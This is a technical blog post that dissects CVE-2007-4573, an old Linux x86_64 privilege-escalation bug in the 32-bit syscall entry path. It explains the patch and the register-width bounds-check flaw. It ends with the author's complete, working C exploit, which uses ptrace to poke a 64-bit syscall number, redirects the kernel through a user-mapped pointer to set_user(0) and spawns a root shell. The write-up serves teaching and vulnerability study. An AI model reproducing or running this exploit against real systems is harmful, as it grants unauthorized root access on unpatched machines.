Made of Bugs

CVE-2007-4573: The Anatomy of a Kernel Exploit

CVE-2007-4573 is two years old at this point, but it remains one of my favorite vulnerabilities. It was a local privilege-escalation vulnerability on all x86_64 kernels prior to v2.6.22.7. It's very simple to understand with a little bit of background, and the exploit is super-simple, but it's still more interesting than Yet Another NULL Pointer Dereference. Plus, it was the first kernel bug I wrote an exploit for, which was fun.

In this post, I'll write up my exploit for CVE-2007-4573, and try to give enough background for someone with some experience with C, Linux, and a bit of x86 assembly to understand what's going on. If you're an experienced kernel hacker, you probably won't find much new here, but if you're not, hopefully you'll get a sense for some of the pieces that go into a kernel exploit.

The patch

I'll start out with the patch, or rather a slightly simplified version, that omits some hunks that will be irrelevant for my discussion. Then I'll explain the context for the patch, and by that point we'll have enough context to understand the exploit code.

A simplified version of the patch follows. (The original is 176df245 in Linus's git repository.) Note that this patch was applied to v2.6.22; these files have since moved around, so pull out an older kernel if you're trying to follow along at home:

--- a/arch/x86_64/ia32/ia32entry.S
+++ b/arch/x86_64/ia32/ia32entry.S
@@ -38,6 +38,18 @@
        movq    %rax,R8(%rsp)

+       .macro LOAD_ARGS32 offset
+       movl \offset(%rsp),%r11d
+       movl \offset+8(%rsp),%r10d
+       movl \offset+16(%rsp),%r9d
+       movl \offset+24(%rsp),%r8d
+       movl \offset+40(%rsp),%ecx
+       movl \offset+48(%rsp),%edx
+       movl \offset+56(%rsp),%esi
+       movl \offset+64(%rsp),%edi
+       movl \offset+72(%rsp),%eax
+       .endm
@@ -334,7 +346,7 @@ ia32_tracesys:
        movq $-ENOSYS,RAX(%rsp) /* really needed? */
        movq %rsp,%rdi        /* &pt_regs -> arg1 */
        call syscall_trace_enter
-       LOAD_ARGS ARGOFFSET  /* reload args from stack in case ptrace changed it */
+       LOAD_ARGS32 ARGOFFSET  /* reload args from stack in case ptrace changed it */
        jmp ia32_do_syscall

The patch defines the LOAD_ARGS32 macro, and replaces LOAD_ARGS with it in several places (I've only shown one for simplicity). LOAD_ARGS32 differs only slightly from the LOAD_ARGS macro that it replaces, which is defined in include/asm-x86_64/calling.h:

.macro LOAD_ARGS offset
movq \offset(%rsp),%r11
movq \offset+8(%rsp),%r10
movq \offset+16(%rsp),%r9
movq \offset+24(%rsp),%r8
movq \offset+40(%rsp),%rcx
movq \offset+48(%rsp),%rdx
movq \offset+56(%rsp),%rsi
movq \offset+64(%rsp),%rdi
movq \offset+72(%rsp),%rax
.endm

As the name suggests, LOAD_ARGS32 loads the registers from the stack as 32-bit values, rather than 64-bit. Importantly, in doing so it takes advantage of a quirk of the x86_64 architecture: writing to the 32-bit form of a register zeroes the top 32 bits of the full 64-bit register. LOAD_ARGS32 thus zero-extends the 32-bit values it loads into the 64-bit registers.
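
The difference between the two macros can be modelled in plain C. This is only a sketch: `load_args` and `load_args32` are hypothetical helper names that each stand in for a single `movq` or `movl` from the saved-register area, not anything that exists in the kernel.

```c
#include <stdint.h>

/* Model of one LOAD_ARGS line: movq copies all 64 bits of the saved slot. */
static uint64_t load_args(uint64_t saved_slot)
{
        return saved_slot;
}

/*
 * Model of one LOAD_ARGS32 line: movl reads only the low 32 bits, and the
 * write to the 32-bit register clears the upper half of the 64-bit one.
 */
static uint64_t load_args32(uint64_t saved_slot)
{
        return (uint64_t)(uint32_t)saved_slot;
}
```

Given a saved slot holding 0x100000005, `load_args` hands back the full value, while `load_args32` yields 5.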

System call handling

So, why is this patch so important? Let's look at the context for the LOAD_ARGS to LOAD_ARGS32 change. ia32entry.S contains the definitions of the entry points for 32-bit compatibility-mode system calls on an x86_64 processor. In other words, these are the entry points used by 32-bit processes running on the 64-bit machine, or by 64-bit processes that use old-style int $0x80 system calls for whatever reason.

There are three entry points in the file: one for 32-bit SYSCALL instructions, one for 32-bit SYSENTER, and one for int $0x80. They are all very similar, and we will only consider the int $0x80 case here. At boot-time, Linux configures the processor so that int $0x80 will dispatch to the ia32_syscall entry point. Ignoring a bunch of debugging information, tracing, and other junk, this entry point's code is essentially:

        movl %eax,%eax

        pushq %rax
        SAVE_ARGS 0,0,1

        GET_THREAD_INFO(%r10)
        orl   $TS_COMPAT,TI_status(%r10)
        testl $_TIF_WORK_SYSCALL_ENTRY,TI_flags(%r10)
        jnz ia32_tracesys

ia32_do_syscall:
        cmpl $(IA32_NR_syscalls-1),%eax
        ja ia32_badsys

        IA32_ARG_FIXUP
        call *ia32_sys_call_table(,%rax,8)

        movq %rax,RAX-ARGOFFSET(%rsp)
        jmp int_ret_from_sys_call

%eax, according to Linux's syscall convention, stores the syscall number. The mov zero-extends it into %rax, and then we save it and the syscall arguments onto the stack.

The next block retrieves the struct thread_info for the current task, sets the TS_COMPAT status bit to indicate that we're handling a 32-bit compatibility mode syscall, and then checks the thread's flags to determine whether this thread has been flagged for extra processing on syscall entry. If so, we jump away to code to handle that work.

Next (at the cmpl), we check to make sure that the requested syscall is in-bounds, and branch to an error path if not.

IA32_ARG_FIXUP is a simple macro that moves registers around to translate between the Linux syscall calling convention and the x86_64 calling convention, which each hold arguments in different registers. Once we've fixed up the registers, the call instruction indexes the system call table by the system call number, looks up the address stored there, and calls into it to dispatch the syscall.

Finally, we save the return code from the system call into the register area on the stack, and jump to code to handle the return to userspace.

One thing we should notice about this code is that when we check that the syscall is in bounds, we compare against the 32-bit %eax register, but when we actually dispatch the syscall, we use the full 64 bits in %rax. The movl at the top of the function serves to zero-extend %eax, so that normally, the top 32 bits of %rax are zero, and this distinction doesn't matter.

The problem arises in the "traced" path in ia32_tracesys, which is (again, with some extra code removed):

        movq %rsp,%rdi        /* &pt_regs -> arg1 */
        call syscall_trace_enter
        LOAD_ARGS ARGOFFSET  /* reload args from stack in case ptrace changed it */
        jmp ia32_do_syscall

Essentially, ia32_tracesys just calls into the C function syscall_trace_enter, with a pointer to the registers saved on the stack, and then restores the register values from the stack and jumps back to execute the system call.

Herein lies the problem. If syscall_trace_enter replaces the on-stack %rax with a 64-bit value, and LOAD_ARGS restores it, then the %eax/%rax distinction above becomes a problem. As long as %eax is at most (IA32_NR_syscalls-1), the bounds check passes, yet %rax can be much larger than the size of the syscall table, causing the call to index off the end of it.
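
The mismatch can be illustrated with a small C model. This is a sketch under assumptions, not kernel code: `NR_SYSCALLS_MODEL` is a made-up table size, and the three function names are hypothetical.

```c
#include <stdint.h>

#define NR_SYSCALLS_MODEL 300  /* hypothetical table size, for illustration */

/* cmpl/ja: the bounds check only looks at the low 32 bits (%eax). */
static int bounds_check_passes(uint64_t rax)
{
        return (uint32_t)rax <= NR_SYSCALLS_MODEL - 1;
}

/* call *table(,%rax,8): the index uses all 64 bits of %rax. */
static int index_in_table(uint64_t rax)
{
        return rax < NR_SYSCALLS_MODEL;
}

/* A value is dangerous when it passes the check but indexes past the table. */
static int slips_past_check(uint64_t rax)
{
        return bounds_check_passes(rax) && !index_in_table(rax);
}
```

A value such as 1 << 32 has zero in its low 32 bits, so it passes the check while indexing far outside the table. Ordinary syscall numbers and plain out-of-range 32-bit values do not slip through.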


So what happens inside syscall_trace_enter, and how can we take advantage of that to load a 64-bit value into the restored %rax? Well, that turns out to be the code that handles processes traced by the ptrace(2) process-tracing mechanism, which, among other things, allows the tracer to stop a child process before each system call, and inspect and modify the child's registers before the system call proceeds.

Reading ptrace(2), we find that we can use ptrace(PTRACE_SYSCALL,…) to cause a process to execute until its next system call, and then, once it's stopped, we can use ptrace(PTRACE_POKEUSER,…) to modify the tracee's registers.

Putting it all together

So, to exploit this bug, we need to:

  • Have a 64-bit process attach to some process with ptrace.
  • Use PTRACE_SYSCALL to stop that process at its next syscall.
  • Have the process execute an int $0x80
  • Have the parent modify %rax in the child to be 64 bits wide, and allow the child to continue.

At this point, the child will index waaay off the end of the syscall table – so far off, in fact, that it will wrap around past the end of memory (On x86_64, the entire kernel is mapped into the last 2 GB of address space). Since the kernel and user programs run in the same address space, this means that, with an appropriate choice of %rax, the kernel will dereference an address in the user address space to find out the address of the function it should jump to in order to handle the system call.
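
The wrap-around is just unsigned 64-bit arithmetic, and a short C sketch makes it concrete. The helper names `slot_address` and `page_base` are hypothetical; the model assumes only that the dispatch reads its target from table + 8 * %rax, computed modulo 2^64.

```c
#include <stdint.h>

/*
 * Address the dispatching call reads its target from: table + 8 * rax.
 * Unsigned arithmetic in C wraps modulo 2^64, matching the address
 * computation being modelled.
 */
static uint64_t slot_address(uint64_t table, uint64_t rax)
{
        return table + 8 * rax;
}

/* Start of the 4 KiB page containing addr. */
static uint64_t page_base(uint64_t addr)
{
        return addr & ~(uint64_t)0xFFF;
}
```

With the example table address 0xffffffff8044b8a0 used in the exploit below and %rax set to 1 << 32, `slot_address` comes out as 0x78044b8a0, a low address in the user half of the address space, and `page_base` of that is 0x78044b000.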

My entire exploit code follows. This is not fully weaponized at all – it depends on tweaking for the specific target kernel, for one, but it works. (Well, if you can find an unpatched kernel anywhere any more these days, it works). Nowadays, if I were writing an exploit like this, I'd plug it into something like Brad Spengler's Enlightenment, which takes care of most of the annoying bits of executing shell-code in-kernel to change the current user, disable any security modules that might be problematic, and work across kernel versions, as necessary.

#include <sys/ptrace.h>
#include <sys/user.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
#include <stddef.h>
#include <signal.h>

/*
 * Replace these with the values of `ia32_sys_call_table' and
 * `set_user' from /proc/kallsyms or /boot/$(uname -r)
 */
#define syscall_table 0xffffffff8044b8a0
#define set_user      0xffffffff8028d785

/*
 We don't _need_ these -- with only a little bit of cleverness, we can
 get around not knowing them, but having them will make the code
 simpler.

 set_user is defined in kernel/sys.c, and can be used to change the
 UID of the current process. We'll trick the kernel into calling it on
 our behalf, and thus avoid having to write any code to run in
 kernel-mode ourselves.
*/

#define offset        (1L << 32)
#define landing       (syscall_table + 8*offset)
/*
  'offset' is the 64-bit value we will load into %rax using ptrace().

  This will cause the "call" instruction we saw above to look up the
  value stored at that index off the syscall table, which is the
  address we compute in "landing".
*/

int main() {
        if((signed long)mmap((void*)(landing&~0xFFF), 4096,
                                PROT_READ|PROT_WRITE,
                                MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,
                                0, 0) < 0) {
                perror("mmap");
                exit(1);
        }
        *(long*)landing = set_user;
        /*
          We use mmap(2) to map a page at "landing", and write a
          pointer to the set_user function there.
        */

        pid_t child;
        child = fork();
        /*
          We fork into two processes. The parent will ptrace the child,
          and the child will execute the `int 0x80` syscall.
        */
        if(child == 0) {
                ptrace(PTRACE_TRACEME, 0, NULL, NULL);
                kill(getpid(), SIGSTOP);
                /*
                  We ask for someone to trace us, and then signal
                  ourselves, which causes us to wait for our parent to
                  attach via `ptrace`.
                */
                __asm__("movl $0, %ebx\n\t"
                        "int $0x80\n");
                /*
                  We then make an (arbitrary) syscall via int 0x80,
                  with %ebx set to 0. Linux's system call convention
                  stores the first argument in %ebx, so if all goes
                  right, when our parent mucks with %rax, this will
                  result in the kernel calling set_user(0), setting
                  our current UID to 0.
                */

                execl("/bin/sh", "/bin/sh", NULL);
                /* Once we have root, we exec a shell. */
        } else {
                wait(NULL);
                ptrace(PTRACE_SYSCALL, child, NULL, NULL);
                wait(NULL);
                ptrace(PTRACE_POKEUSER, child, offsetof(struct user, regs.orig_rax),
                       (void*)offset);
                ptrace(PTRACE_DETACH, child, NULL, NULL);
                /* Stay around until the child's shell exits. */
                wait(NULL);
                /*
                  All we need to do in the parent is `wait` for the child
                  to stop, allow it to advance until the next syscall,
                  use `PTRACE_POKEUSER` to poke `offset` into `%rax`,
                  and then detach and let it run.
                */
        }
        return 0;
}